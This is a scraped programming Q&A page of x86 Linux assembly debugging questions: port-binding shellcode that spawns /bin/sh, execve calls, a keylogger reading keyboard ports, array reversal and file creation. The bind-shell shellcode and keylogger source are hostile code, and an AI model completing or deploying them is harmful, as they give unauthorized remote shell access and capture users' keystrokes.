segmentation fault in port-binding shellcode - linux

I am trying to open a listener using shellcode but i get segmentation error , i read that this error is due to writing into read only location in memory , and that -N option in the ld linker will solve it out which did not work for me.
the code :
BITS 32
global _start
_start:
xor eax,eax
xor ebx,ebx
cdq
push eax
push byte 0x01
push byte 0x02
mov ecx,esp
inc bl
mov al,102
int 80h
mov esi,eax
push edx
push 0xAAAA02AA
mov ecx,esp
push byte 0x10
push ecx
push esi
mov ecx,esp
inc bl
mov al,102
int 80h
push edx
push esi
mov ecx,esp
mov byte bl,0x04
mov al,102
int 80h
push edx
push edx
push esi
mov ecx,esp
inc bl
mov al,102
int 80h
mov ebx,esp
xor ecx,ecx
mov cl,3
loop:
dec cl
mov al,63
int 80h
jnz loop
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b
int 80h
i then run the following commands:
nasm -f elf file.asm
ld -N file.o -o file
when i run file i get segmentation error, please help .

Learn to use a debugger and comment your code. That said, the problem seems to be with the dup2 syscall getting bad argument, because esp that gets loaded into ebx is unlikely to be a valid descriptor. This results in an error return, which then screws up all further syscalls.

Related

execute system command (bash) using assembly?

Basically I am trying to execute the command /bin/ls using assembly, but unfortunately I am failing:
SECTION .data
buf: db "Hello", 5
SECTION .text
global _start
_start:
xor eax, eax
mov edx, eax
push edx
mov eax, 0x736c2f2f ; "sl/"
push eax
mov eax, 0x6e69622f ; "nib/"
push eax
mov ebx, esp
push edx
mov eax, 0x2f
push eax
mov ecx, esp
mov eax, 11
xor edx, edx
int 0x80
mov eax, 1
int 0x80
But If I change the mov eax, 11 to mov eax, 4 and add mov edx, 7 after xor edx, edx. It do print /bin/ls
Can anyone point the mistake I am making?
Compiling the code with nasm -g -f elf -F dwarf ./shell.asm && ld -m elf_i386 -o shell shell.o and my arc is Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
Found the problem, as pointed by #Jestor (thank you), I needed to store the executing file at ebx and all the arguments including the filename in ecx and set edx to null as below:
SECTION .data
buf: db "./", 0
SECTION .text
global _start
_start:
xor eax, eax
xor edx, edx
push eax
push long 0x736c2f2f ; "sl/"
push long 0x6e69622f ; "nib/"
mov ebx, esp
push eax
push byte 0x2f
mov esi, esp
push eax
push esi
push ebx
mov ecx, esp
mov eax, 0x0b
int 0x80
mov eax, 1
int 0x80
after my working shell, the ecx looked like below:
(gdb) x/50x $ecx
0xffffd370: 0xffffd384 0xffffd37c 0x00000000 0x0000002f
0xffffd380: 0x00000000 0x6e69622f 0x736c2f2f 0x00000000

Linux keylogger

I make a keylogger for Linux 64-bit reading directly the hardware keyboard controller port 60h and 64h and with sys calls however my keylogger don't even create the log and show the segmentation fault message. This is the source of the keylogger that i make:
MOV RAX,85
MOV RDI,FILE_NAME
MOV RSI,0
INT 80h
MOV [FD],RAX
MOV RAX,173
MOV RDI,60h
MOV RSI,1
INT 80h
MOV RAX,173
MOV RDI,64h
MOV RSI,1
INT 80h
KEYLOGGER:
L0:
CALL GET_SCAN_CODE
MOV BYTE[SCAN_CODE],AL
MOV RDI,[FD]
LEA RSI,[SCAN_CODE]
MOV RDX,1
MOV RAX,1
INT 80h
JMP L0
GET_SCAN_CODE:
IN AL,64h
AND AL,21h
CMP AL,1
JNZ GET_SCAN_CODE
CALL DELAY
IN AL,60h
RET
I am using TAILS. Where is the error at my source above.

simplest way to pass arguments to execve syscall

Supposedly, it is very simple to pass arguments to an execve syscall.
In a tutorial, the instructor says it's only in one line, and leave this as an exercise.
The code below executes "ls" command. And I'm trying to execute something like "ls -la".
After searching and searching, I still have no idea where to add the "-la" !
I know it's in the structure pointed to by the ecx register, and that it has to be null terminated. For now, ecx contains an address to /bin/ls . Should the arguments be another address ? argv is an array, with first element being "/bin/ls"...
global _start
section .text
_start:
xor eax, eax
push eax
push 0x736c2f6e
push 0x69622f2f ; //bin/ls
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
This is not working :
xor eax, eax
push eax
push 0x2a632020
push 0x736c2f6e
push 0x69622f2f ; /bin/ls c*
mov ecx, esp
You must save the -la argument in the ecx register and copy it to the esp register (I mean in the stack)
push eax
push byte 0x61
push word 0x6c2d
mov ecx, esp ; -la
The following is your modified code :
global _start
section .text
_start:
xor eax, eax
push eax
push byte 0x61
push word 0x6c2d
mov ecx, esp ; -la
push eax
push 0x736c2f6e
push 0x69622f2f ; //bin/ls
mov ebx, esp
push edx
push ecx
push ebx
mov ecx, esp
mov al, 11
int 0x80
The code working fine :)
% ./list
total 4
-rwxrwxr-x 1 febri febri 512 Oct 5 07:45 list
%

Faulty reversing array in assembly

Ah well I want to make procedure that reverses array
so I made this
section .data
rev:
push eax
push ebx
push esi
push ecx
mov ebx,ecx
mov eax,esi
Lrev_1:
push dword[esi]
inc esi
loop Lrev_1
mov ecx,ebx
Lrev_2:
pop dword[eax]
inc eax
loop Lrev_2
pop ecx
pop esi
pop ebx
pop eax
ret
msg dd "Hello"
section .text
global _start
_start:
mov esi,msg
mov ecx,5
call rev
mov eax,4
mov ebx,1
mov ecx,msg
mov edx,5
int 80h
mov eax,1
xor ebx,ebx
int 80h
And It perfectly works fine but as you can see I made it to push all the contents of memory address to stack which can be slow (like turtle)
So I try to use this way
And then I implemented it as I can into these 3 ways
section .data
rev1:
push eax
push ebx
push esi
push edi
Lrev1:
cmp esi,edi
jge Lrev1_out
mov eax,dword[esi]
mov ebx,dword[edi]
mov dword[esi],ebx
mov dword[edi],eax
inc esi
dec edi
jmp Lrev1
Lrev1_out:
pop edi
pop esi
pop ebx
pop eax
ret
rev2:
push esi
push edi
Lrev2:
cmp esi,edi
jge Lrev2_out
push dword[esi]
push dword[edi]
pop dword[esi]
pop dword[edi]
pop edi
pop esi
ret
rev3:
push eax
push esi
push edi
Lrev3:
cmp esi,edi
jge Lrev3_out
mov eax,dword[esi]
xchg eax,dword[edi]
mov dword[esi],eax
inc esi
dec edi
jmp Lrev3
Lrev3_out:
pop edi
pop esi
pop eax
ret
msg dd "Hello"
section .text
global _start
_start:
mov esi,msg
mov edi,esi
add edi,4
;if I call rev1 or rev2 here msg will be reverse into oH for me
;if I call rev3 here msg will be reversed into oHel for me
mov eax,4
mov ebx,1
mov ecx,msg
mov edx,5
int 80h
mov eax,1
xor ebx,ebx
int 80h
Well, My expected result is olleH.But then I got the unexpected result.
Did I miss something? Or just added something even more?
to get the true reversed result
It looks like you're trying to reverse bytes that you load as 32 bit double words instead.
Maybe this will help for rev1?
mov al,[esi]
mov bl,[edi]
mov [esi],bl
mov [edi],al
You have similar problems in rev2 and rev3. Also XCHG with memory has implications far beyond just exchanging reg<->mem... I'd be careful with that instruction.

open syscall failes to create a file without a reason

section .text
global _start ;must be declared for linker (ld)
_start:
mov eax,5
mov ebx,plname
mov ecx,0x202
mov edx,0700o
int 0x80
mov eax,4
mov ecx,plaintext
mov edx,256
int 0x80
xor eax,eax
inc eax
xor ebx,ebx
int 0x80
section .data
key db '123456passwordqwerty',0x0
keylen equ $ - key ;length of our dear string
plname db 'plname.bin',0x0
plaintext times 256 db 1
first part planned to create a file specified in plname, first time I'd tryed create it into /tmp/plname.bin and after fail, try to create at least into excuting directory.I've also tried create syscall and got the same results.
programm fails on open syscall, after excuting int 0x80 instruction, eax contains -2, programm ends normally, but doesn't create file.
here i got flags and mods
https://sourceware.org/gdb/onlinedocs/gdb/mode_005ft-Values.html#mode_005ft-Values
here is gdb output
Dump of assembler code for function _start:
0x08048080 <+0>: mov $0x8,%eax
0x08048085 <+5>: mov $0x80490c9,%ebx
0x0804808a <+10>: mov $0x700,%ecx
0x0804808f <+15>: int $0x80
0x08048091 <+17>: mov $0x4,%eax
0x08048096 <+22>: mov $0x80490e3,%ecx
0x0804809b <+27>: mov $0x100,%edx
0x080480a0 <+32>: int $0x80
0x080480a2 <+34>: xor %eax,%eax
0x080480a4 <+36>: inc %eax
0x080480a5 <+37>: xor %ebx,%ebx
0x080480a7 <+39>: int $0x80
End of assembler dump.
Breakpoint 1, 0x0804808f in _start ()
(gdb) i r eax
eax 0x5 5
(gdb) stepi
0x08048094 in _start ()
(gdb) i r eax
eax 0x5 5
(gdb) i r eax ebx ecx edx esi edi
eax 0x5 5
ebx 0x80490d1 134516945
ecx 0x202 514
edx 0x1c0 448
esi 0x0 0
edi 0x0 0
(gdb) stepi
0x08048096 in _start ()
(gdb) i r eax ebx ecx edx esi edi
eax 0xfffffffe -2
ebx 0x80490d1 134516945
ecx 0x202 514
edx 0x1c0 448
esi 0x0 0
edi 0x0 0
You used the wrong reference manual. What you linked to is the flags used in the gdb protocol, not the ones used by system calls.
O_CREAT is actually 0100 octal, so you should do mov ecx,0102o.
Also note you have forgotten to move the returned file descriptor from eax to ebx for the sys_write.
Working code:
section .text
global _start ;must be declared for linker (ld)
_start:
mov eax,5
mov ebx,plname
mov ecx,0102o
mov edx,0700o
int 0x80
mov ebx, eax
mov eax,4
mov ecx,plaintext
mov edx,256
int 0x80
xor eax,eax
inc eax
xor ebx,ebx
int 0x80
section .data
key db '123456passwordqwerty',0x0
keylen equ $ - key ;length of our dear string
plname db 'plname.bin',0x0
plaintext times 256 db 1

Resources